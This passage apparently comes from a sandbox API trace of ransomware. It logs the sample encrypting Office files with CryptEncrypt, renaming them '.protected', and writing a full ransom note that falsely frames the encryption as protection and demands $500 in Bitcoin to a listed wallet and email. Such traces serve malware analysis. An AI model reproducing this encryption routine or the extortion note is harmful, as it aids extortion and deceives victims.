out: lpNewFilePointer=0x0) returned 1 [0068.708] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0068.709] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0068.709] CloseHandle (hObject=0xd8) returned 1 [0068.725] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll.protected") returned 80 [0068.725] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\wwintl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\wwintl.dll.trx_dll.protected")) returned 1 [0068.726] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0068.726] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="Windows") returned 1 [0068.726] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="Program Files") returned 1 [0068.726] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="Program Files (x86)") returned 1 [0068.726] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="$Recycle.bin") returned 1 [0068.726] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="System Volume Information") returned 1 [0068.726] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll") returned 71 [0068.726] StrStrIW 
(lpFirst="WWINTL.REST.trx_dll", lpSrch=".protected") returned 0x0 [0068.726] lstrcmpW (lpString1="WWINTL.REST.trx_dll", lpString2="RESTORE_FILES.txt") returned 1 [0068.726] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0068.726] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0068.726] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\wwintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0068.726] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll") returned 71 [0068.726] StrStrW (lpFirst="WWINTL.REST.trx_dll", lpSrch=".txt") returned 0x0 [0068.726] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll") returned 71 [0068.726] StrStrW (lpFirst="WWINTL.REST.trx_dll", lpSrch=".rar") returned 0x0 [0068.726] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll") returned 71 [0068.726] StrStrW (lpFirst="WWINTL.REST.trx_dll", lpSrch=".zip") returned 0x0 [0068.726] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.733] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.734] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | 
out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.735] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.735] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0068.742] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0068.742] CloseHandle (hObject=0xd8) returned 1 [0068.743] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll.protected") returned 81 [0068.743] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\wwintl.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\wwintl.rest.trx_dll.protected")) returned 1 [0068.744] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0068.744] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="Windows") returned 1 [0068.744] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="Program Files") returned 1 [0068.744] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="Program Files (x86)") returned 1 [0068.744] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0068.744] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="System Volume Information") returned 1 [0068.744] 
wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll") returned 72 [0068.744] StrStrIW (lpFirst="XLINTL32.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0068.744] lstrcmpW (lpString1="XLINTL32.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned 1 [0068.744] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0068.744] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0068.744] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlintl32.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0068.745] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll") returned 72 [0068.745] StrStrW (lpFirst="XLINTL32.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0068.745] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll") returned 72 [0068.745] StrStrW (lpFirst="XLINTL32.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0068.745] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll") returned 72 [0068.745] StrStrW (lpFirst="XLINTL32.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0068.745] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.746] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, 
dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.746] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.747] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.747] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0068.750] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0068.751] CloseHandle (hObject=0xd8) returned 1 [0068.751] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll.protected") returned 82 [0068.751] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlintl32.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlintl32.dll.trx_dll.protected")) returned 1 [0068.752] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0068.752] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="Windows") returned 1 [0068.752] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="Program Files") returned 1 [0068.752] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="Program Files (x86)") returned 1 
[0068.752] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="$Recycle.bin") returned 1 [0068.752] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="System Volume Information") returned 1 [0068.752] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll") returned 73 [0068.752] StrStrIW (lpFirst="XLINTL32.REST.trx_dll", lpSrch=".protected") returned 0x0 [0068.752] lstrcmpW (lpString1="XLINTL32.REST.trx_dll", lpString2="RESTORE_FILES.txt") returned 1 [0068.752] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0068.752] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0068.752] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlintl32.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0068.752] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll") returned 73 [0068.752] StrStrW (lpFirst="XLINTL32.REST.trx_dll", lpSrch=".txt") returned 0x0 [0068.753] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll") returned 73 [0068.753] StrStrW (lpFirst="XLINTL32.REST.trx_dll", lpSrch=".rar") returned 0x0 [0068.753] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll") returned 73 [0068.753] StrStrW (lpFirst="XLINTL32.REST.trx_dll", lpSrch=".zip") returned 0x0 [0068.753] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, 
lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.756] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.756] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.758] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.758] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0068.765] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0068.765] CloseHandle (hObject=0xd8) returned 1 [0068.765] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll.protected") returned 83 [0068.765] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlintl32.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlintl32.rest.trx_dll.protected")) returned 1 [0068.766] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0068.766] lstrcmpiW 
(lpString1="XLSLICER.DLL.trx_dll", lpString2="Windows") returned 1 [0068.766] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="Program Files") returned 1 [0068.766] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="Program Files (x86)") returned 1 [0068.766] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0068.766] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="System Volume Information") returned 1 [0068.766] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll") returned 72 [0068.766] StrStrIW (lpFirst="XLSLICER.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0068.766] lstrcmpW (lpString1="XLSLICER.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned 1 [0068.766] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0068.766] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0068.766] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlslicer.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0068.766] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll") returned 72 [0068.766] StrStrW (lpFirst="XLSLICER.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0068.767] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll") returned 72 [0068.767] StrStrW (lpFirst="XLSLICER.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0068.767] lstrlenW 
(lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll") returned 72 [0068.767] StrStrW (lpFirst="XLSLICER.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0068.767] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.780] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.780] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.789] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.789] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0068.789] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0068.789] CloseHandle (hObject=0xd8) returned 1 [0068.790] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll.protected") returned 82 [0068.790] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlslicer.dll.trx_dll"), 
lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlslicer.dll.trx_dll.protected")) returned 1 [0068.791] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0068.791] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0068.791] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\RESTORE_FILES.txt") returned 69 [0068.791] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0068.791] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0068.791] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0068.792] lstrlenA (lpString="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") returned 684 [0068.792] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0068.792] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0068.792] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, 
lpOverlapped=0x0) returned 1 [0068.792] CloseHandle (hObject=0xd4) returned 1 [0068.792] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0068.792] lstrcmpiW (lpString1="3082", lpString2="Windows") returned -1 [0068.792] lstrcmpiW (lpString1="3082", lpString2="Program Files") returned -1 [0068.792] lstrcmpiW (lpString1="3082", lpString2="Program Files (x86)") returned -1 [0068.792] lstrcmpiW (lpString1="3082", lpString2="$Recycle.bin") returned 1 [0068.792] lstrcmpiW (lpString1="3082", lpString2="System Volume Information") returned -1 [0068.792] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082") returned 51 [0068.792] lstrcmpW (lpString1="3082", lpString2=".") returned 1 [0068.792] lstrcmpW (lpString1="3082", lpString2="..") returned 1 [0068.792] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\*") returned 53 [0068.792] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 [0068.802] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0068.802] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0068.802] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0068.802] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0068.802] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0068.802] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\.") returned 53 [0068.802] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0068.802] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 
[0068.803] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0068.803] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0068.803] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0068.803] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0068.803] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0068.803] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\..") returned 54 [0068.803] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0068.803] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0068.804] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0068.804] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="Windows") returned -1 [0068.804] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="Program Files") returned -1 [0068.804] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="Program Files (x86)") returned -1 [0068.804] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0068.804] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0068.804] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll") returned 72 [0068.804] StrStrIW (lpFirst="ENVELOPR.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0068.804] lstrcmpW (lpString1="ENVELOPR.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0068.804] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0068.804] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: 